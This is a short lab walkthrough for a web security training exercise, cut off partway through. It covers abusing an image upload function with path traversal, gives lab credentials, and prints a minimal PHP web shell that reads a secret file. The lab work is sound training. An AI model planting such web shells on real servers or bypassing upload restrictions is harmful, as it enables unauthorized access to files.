🔐 Lab Walkthrough: Exploiting Vulnerable File Upload with Path Traversal

📝 Info

• Target: Exploit a vulnerable image upload function.
• Note: The server is configured to block execution of user-uploaded files inside the default folder, but we can bypass this using a secondary vulnerability (Path Traversal).
• Credentials:
  • User: wiener
  • Pass: peter

🎯 Goal

• Upload a basic PHP web shell.

• Use it to read the contents of:

  /home/carlos/secret
  
  

• Submit the extracted secret.

🛠️ Steps

1️⃣ Login

• Log in with wiener:peter.

2️⃣ Create PHP Web Shell

<?php
echo file_get_contents('/home/carlos/secret');
?>

3️⃣ Upload Attempt

• Upload shell.php.